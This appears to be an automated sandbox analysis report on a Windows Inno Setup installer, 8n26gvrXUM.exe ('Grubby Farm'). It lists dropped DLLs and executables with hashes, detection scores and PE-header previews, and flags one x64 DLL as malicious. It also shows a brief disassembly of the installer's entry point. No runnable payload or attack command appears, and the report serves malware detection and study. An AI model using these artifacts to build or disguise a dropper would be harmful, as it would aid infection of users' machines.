                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):13312
                                                                            Entropy (8bit):5.745960477552938
                                                                            Encrypted:false
                                                                            SSDEEP:384:BXvhMwoSitz/bjx7yxnbdn+EHvbsHoOODCg:BZ7FEAbd+EDsIO
                                                                            MD5:A813D18268AFFD4763DDE940246DC7E5
                                                                            SHA1:C7366E1FD925C17CC6068001BD38EAEF5B42852F
                                                                            SHA-256:E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64
                                                                            SHA-512:B310ED4CD2E94381C00A6A370FCB7CC867EBE425D705B69CAAAAFFDAFBAB91F72D357966916053E72E68ECF712F2AF7585500C58BB53EC3E1D539179FCB45FB4
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Joe Sandbox View:
                                                                            • Filename: 1944b321.msi, Detection: malicious, Browse
                                                                            • Filename: Xzm9fAfKhB.exe, Detection: malicious, Browse
                                                                            • Filename: L9rm7AX4mp.exe, Detection: malicious, Browse
                                                                            • Filename: AX3-GUI-45.exe, Detection: malicious, Browse
                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                            • Filename: fe61hqe0Dt.exe, Detection: malicious, Browse
                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                            • Filename: AX3-GUI-45.exe, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(............................@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp
                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):6144
                                                                            Entropy (8bit):4.215994423157539
                                                                            Encrypted:false
                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                            MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                            SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                            SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                            SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):23312
                                                                            Entropy (8bit):4.596242908851566
                                                                            Encrypted:false
                                                                            SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                            MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                            SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                            SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                            SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\8n26gvrXUM.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1181184
                                                                            Entropy (8bit):6.401110768123626
                                                                            Encrypted:false
                                                                            SSDEEP:24576:jYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5lNx94k:KGUhni7iSFCQ9J
                                                                            MD5:BCC236A3921E1388596A42B05686FF5E
                                                                            SHA1:43BFFBBAC6A1BF5F1FA21E971E06E6F1D0AF9263
                                                                            SHA-256:43A656BCD060E8A36502CA2DEB878D56A99078F13D3E57DCD73A87128588C9E9
                                                                            SHA-512:E3BAAF1A8F4EB0E1AB57A1FB35BC7DED476606B65FAFB09835D34705D8C661819C3CFA0ECC43C5A0D0085FD570DF581438DE27944E054E12C09A6933BBF5CE04
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O.....................N....................@..............................................@...............................7......8...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...8............"..............@..@....................................@..@........................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):13312
                                                                            Entropy (8bit):5.745960477552938
                                                                            Encrypted:false
                                                                            SSDEEP:384:BXvhMwoSitz/bjx7yxnbdn+EHvbsHoOODCg:BZ7FEAbd+EDsIO
                                                                            MD5:A813D18268AFFD4763DDE940246DC7E5
                                                                            SHA1:C7366E1FD925C17CC6068001BD38EAEF5B42852F
                                                                            SHA-256:E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64
                                                                            SHA-512:B310ED4CD2E94381C00A6A370FCB7CC867EBE425D705B69CAAAAFFDAFBAB91F72D357966916053E72E68ECF712F2AF7585500C58BB53EC3E1D539179FCB45FB4
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(............................@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp
                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):6144
                                                                            Entropy (8bit):4.215994423157539
                                                                            Encrypted:false
                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                            MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                            SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                            SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                            SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):23312
                                                                            Entropy (8bit):4.596242908851566
                                                                            Encrypted:false
                                                                            SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                            MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                            SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                            SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                            SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\8n26gvrXUM.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1181184
                                                                            Entropy (8bit):6.401110768123626
                                                                            Encrypted:false
                                                                            SSDEEP:24576:jYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5lNx94k:KGUhni7iSFCQ9J
                                                                            MD5:BCC236A3921E1388596A42B05686FF5E
                                                                            SHA1:43BFFBBAC6A1BF5F1FA21E971E06E6F1D0AF9263
                                                                            SHA-256:43A656BCD060E8A36502CA2DEB878D56A99078F13D3E57DCD73A87128588C9E9
                                                                            SHA-512:E3BAAF1A8F4EB0E1AB57A1FB35BC7DED476606B65FAFB09835D34705D8C661819C3CFA0ECC43C5A0D0085FD570DF581438DE27944E054E12C09A6933BBF5CE04
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O.....................N....................@..............................................@...............................7......8...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...8............"..............@..@....................................@..@........................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1203559
                                                                            Entropy (8bit):6.373854032166884
                                                                            Encrypted:false
                                                                            SSDEEP:24576:bYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5lNx941:yGUhni7iSFCQ9e
                                                                            MD5:A6A8A9EA416599646B0F6C603068D2D3
                                                                            SHA1:689AAD3A2A42F749E0C173A2F9E6E3751F7178BE
                                                                            SHA-256:20E6E5672C89CA84CAA6A060F97CDBAF4B042AC21AFCD2524C5FD120E7844164
                                                                            SHA-512:93BF69A80833B176190EDDD926B34AD466A5A1EE7893BFEBB9E2179C42ACA1BB3C36DBB98DE509B2DEC1F97AFFA2862BF9CA8A797D487AA4443EB5CDAF1C2236
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O.....................N....................@..............................................@...............................7......8...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...8............"..............@..@....................................@..@........................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp
                                                                            File Type:InnoSetup Log Grubby Farm, version 0x418, 3545 bytes, 928100\37\user\37, C:\Users\user\AppData\Local\376\377\377\
                                                                            Category:dropped
                                                                            Size (bytes):3545
                                                                            Entropy (8bit):3.7852110149300877
                                                                            Encrypted:false
                                                                            SSDEEP:96:Y/42pYFZn3jCdfc1AGlEDA4MZAe2LWxHh4t:YTqFZ32f7fDSmyH+t
                                                                            MD5:A2072C87B0AAA2FD74FB53106DAFBDBF
                                                                            SHA1:EB1CECF4F4DC12FD9E2D6BBBA441BB665DA98F20
                                                                            SHA-256:E8613D949AC73411BA8E7D7338C6850B10628F89C9C534BCD377E2FE3985CDB5
                                                                            SHA-512:4639C15E88B1D3441C1B93FD38ADC3617B9D62B3D0A4AD649768CD84A2BD274E1F3D48B035E5FFC3F45FF5CC0A3AAFECC68A424D6D1B5D4A86A8216B01104E54
                                                                            Malicious:false
                                                                            Preview:Inno Setup Uninstall Log (b)....................................Grubby Farm.....................................................................................................................Grubby Farm.................................................................................................................................%...............................................................................................................r ............s.......w........9.2.8.1.0.0......A.r.t.h.u.r......C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l....................... .....L....b...IFPS...............................................................................................................................................................BOOLEAN..............TEXECWAIT.................!MAIN....-1..'...dll:kernel32.dll.GetCurrentProcess.......(...dll:kernel32.dll.TerminateProcess............y... ...RESTARTINSTALLERWITHSILENTPARAMS....-1..EXPANDCONSTANT........EXEC.....
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1203559
                                                                            Entropy (8bit):6.373854032166884
                                                                            Encrypted:false
                                                                            SSDEEP:24576:bYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5lNx941:yGUhni7iSFCQ9e
                                                                            MD5:A6A8A9EA416599646B0F6C603068D2D3
                                                                            SHA1:689AAD3A2A42F749E0C173A2F9E6E3751F7178BE
                                                                            SHA-256:20E6E5672C89CA84CAA6A060F97CDBAF4B042AC21AFCD2524C5FD120E7844164
                                                                            SHA-512:93BF69A80833B176190EDDD926B34AD466A5A1EE7893BFEBB9E2179C42ACA1BB3C36DBB98DE509B2DEC1F97AFFA2862BF9CA8A797D487AA4443EB5CDAF1C2236
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O.....................N....................@..............................................@...............................7......8...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...8............"..............@..@....................................@..@........................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp
                                                                            File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1745567
                                                                            Entropy (8bit):7.095269474684338
                                                                            Encrypted:false
                                                                            SSDEEP:49152:0OlRYeHGFRTIKJTPtpR2sVRcr4kO/B8nLj1yucyUeR37:0OlRYeHGFRkK7JuawLjj6eR37
                                                                            MD5:C6A93561FA2B6AF08724AE1CA16AF71C
                                                                            SHA1:1C2DD7373C544B1C8CF6EAB0CA2E17D41AE62363
                                                                            SHA-256:8FA95C6F3629180087E4BD86D10F55AEC2AE3FE07A780AF7B8EDF23A39A2872D
                                                                            SHA-512:A50B3ACC0415B61CC39E2FC12311EE6B9B539D5AF0A828C73CA422875D1A96EC13B719C702B29C3F8915DAA958DE2A9FDDD20FE3D6D4E0A36F665EF872353FB9
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 43%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....ZH.n........&"...+.4...j...... ................................................U....`... .........................................q....................@...g...h...9...... ........................... 5..(...................`... ............................text....3.......4..................`..`.data...`....P.......8..............@....rdata.......`.......<..............@..@.pdata...g...@...h..................@..@.xdata..............|..............@..@.bss....@....p...........................edata..q............8..............@..@.idata........... ...:..............@....CRT....`............Z..............@....tls.................\..............@....reloc.. ............^..............@..B........................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp
                                                                            File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1745567
                                                                            Entropy (8bit):7.095269474684338
                                                                            Encrypted:false
                                                                            SSDEEP:49152:0OlRYeHGFRTIKJTPtpR2sVRcr4kO/B8nLj1yucyUeR37:0OlRYeHGFRkK7JuawLjj6eR37
                                                                            MD5:C6A93561FA2B6AF08724AE1CA16AF71C
                                                                            SHA1:1C2DD7373C544B1C8CF6EAB0CA2E17D41AE62363
                                                                            SHA-256:8FA95C6F3629180087E4BD86D10F55AEC2AE3FE07A780AF7B8EDF23A39A2872D
                                                                            SHA-512:A50B3ACC0415B61CC39E2FC12311EE6B9B539D5AF0A828C73CA422875D1A96EC13B719C702B29C3F8915DAA958DE2A9FDDD20FE3D6D4E0A36F665EF872353FB9
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 43%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....ZH.n........&"...+.4...j...... ................................................U....`... .........................................q....................@...g...h...9...... ........................... 5..(...................`... ............................text....3.......4..................`..`.data...`....P.......8..............@....rdata.......`.......<..............@..@.pdata...g...@...h..................@..@.xdata..............|..............@..@.bss....@....p...........................edata..q............8..............@..@.idata........... ...:..............@....CRT....`............Z..............@....tls.................\..............@....reloc.. ............^..............@..B........................................................................................................................................................................
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):55
                                                                            Entropy (8bit):4.306461250274409
                                                                            Encrypted:false
                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                            Malicious:false
                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.932606554344445
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                            • Inno Setup installer (109748/4) 1.08%
                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            File name:8n26gvrXUM.exe
                                                                            File size:1'479'422 bytes
                                                                            MD5:c6f9f0ec394a72fb302efbcf74da2ea7
                                                                            SHA1:143c8fe025fbfd0afe9c88003315bc5a4720439a
                                                                            SHA256:0a63068ec9d94fef476d9e906fb4920de32e70b77daa24a8b2a0786f23889a1a
                                                                            SHA512:0ae6cce0267432ea2a6f44a40d9171238ee8c2025934e2b5a46d7cc7c4ffaefda483440f0cef7d1502c7e74124116565b11dbb1f14a6b6b02313ac45d3b64a45
                                                                            SSDEEP:24576:QMjhJ3I+qWJFFjV96zSzjq7z16g/RMcdGoKmS896ORyAt05bmktUNudtJjdPrF:jnwuVnFzjql6t5ofSs60tab7SNudXjdZ
                                                                            TLSH:2C652302B3C34871F8690A349C62C550EE17BD681DF6601B6EB9FE0E8DF92C25C7DA64
                                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                            Icon Hash:29226ee6b692c62f
                                                                            Entrypoint:0x416478
                                                                            Entrypoint Section:.itext
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x457CA289 [Mon Dec 11 00:12:57 2006 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:5
                                                                            OS Version Minor:0
                                                                            File Version Major:5
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:5
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:483f0c4259a9148c34961abbda6146c1
                                                                            Instruction
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            add esp, FFFFFFA4h
                                                                            push ebx
                                                                            push esi
                                                                            push edi
                                                                            xor eax, eax
                                                                            mov dword ptr [ebp-3Ch], eax
                                                                            mov dword ptr [ebp-40h], eax
                                                                            mov dword ptr [ebp-5Ch], eax
                                                                            mov dword ptr [ebp-30h], eax
                                                                            mov dword ptr [ebp-38h], eax
                                                                            mov dword ptr [ebp-34h], eax
                                                                            mov dword ptr [ebp-2Ch], eax
                                                                            mov dword ptr [ebp-28h], eax
                                                                            mov dword ptr [ebp-14h], eax
                                                                            mov eax, 004152B8h
                                                                            call 00007F85DC5EA0D1h
                                                                            xor eax, eax
                                                                            push ebp
                                                                            push 00416B45h
                                                                            push dword ptr fs:[eax]
                                                                            mov dword ptr fs:[eax], esp
                                                                            xor edx, edx
                                                                            push ebp
                                                                            push 00416B01h
                                                                            push dword ptr fs:[edx]
                                                                            mov dword ptr fs:[edx], esp
                                                                            mov eax, dword ptr [0041AB48h]
                                                                            call 00007F85DC5F897Bh
                                                                            call 00007F85DC5F8522h
                                                                            lea edx, dword ptr [ebp-14h]
                                                                            xor eax, eax
                                                                            call 00007F85DC5F21A4h
                                                                            mov edx, dword ptr [ebp-14h]
                                                                            mov eax, 0041D6E8h
                                                                            call 00007F85DC5E8707h
                                                                            push 00000002h
                                                                            push 00000000h
                                                                            push 00000001h
                                                                            mov ecx, dword ptr [0041D6E8h]
                                                                            mov dl, 01h
                                                                            mov eax, dword ptr [0040F080h]
                                                                            call 00007F85DC5F2A8Fh
                                                                            mov dword ptr [0041D6ECh], eax
                                                                            xor edx, edx
                                                                            push ebp
                                                                            push 00416AADh
                                                                            push dword ptr fs:[edx]
                                                                            mov dword ptr fs:[edx], esp
                                                                            call 00007F85DC5F8A03h
                                                                            mov dword ptr [0041D6F4h], eax
                                                                            mov eax, dword ptr [0041D6F4h]
                                                                            cmp dword ptr [eax+0Ch], 01h
                                                                            jne 00007F85DC5F9D6Ah
                                                                            mov eax, dword ptr [0041D6F4h]
                                                                            mov edx, 00000028h
                                                                            call 00007F85DC5F2F58h
                                                                            mov edx, dword ptr [0041D6F4h]
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1e0000xf9e.idata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x210000x102d4.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
